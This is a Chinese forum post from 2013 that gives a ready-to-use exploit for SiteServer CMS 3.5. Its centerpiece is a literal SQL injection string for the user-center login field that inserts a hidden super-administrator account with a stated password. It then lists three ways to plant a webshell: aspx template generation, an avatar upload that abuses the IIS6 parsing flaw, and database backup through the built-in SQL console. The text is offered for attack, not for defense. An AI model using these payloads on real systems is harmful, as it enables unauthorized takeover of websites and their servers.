经测试秒杀最新的3.5版
% L+ B0 A8 M p6 w) O& ]) ^stieserver官网:www.siteserver.cn
) ]) I( s3 v/ F+ ^ r: oEXP:
+ V7 ^" \& R3 A1 d0 T, y直接访问UserCenter/login.aspx, C9 P5 y# q* g8 Y9 q
用户名处输入:
8 X" a) E0 c, ~- n( Z# @0 {" O
/ Z1 M) e* u7 F" O123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
. }$ A+ f& V: P, P8 t9 n密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
+ ~1 s8 q# E" t' i4 |0 e% Y, u之后再访问后台SiteServer/login.aspx用插入的用户登陆6 H& u% e1 A7 C
后台拿webshell的三种方法:
! h5 S1 r9 z5 a: M! m+ v, _0 z一、+ O) A5 X0 w5 Y# s! }) }
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx3 z: `) M# Y8 Z( O
二、; h* Q/ D* K6 d$ Q2 G' O
成员权限-》添加用户-》用户名为:1.asp7 L( B6 k" u0 T* R2 g9 j
http://127.0.0.1/usercenter/
- ~& ]2 Q4 J8 C; J( J用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell G2 r2 S6 }* u5 \
(ps:后台添加用户时不会验证是否含有非法字符)
3 ]1 R6 F4 f- _& f, s1 l' J, I' h6 b三、
1 w# }2 q2 {7 p1 ? K系统工具-》实用工具-》机器参数查看1 l9 T) H3 }: X1 j b& X" E
可以看到数据库类型、名称,WEB路径" c& U! |, ]# r& P1 K+ G! F+ R
系统工具-》数据库工具-》SQL语句查询
5 `% ^ T2 W) d9 `这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对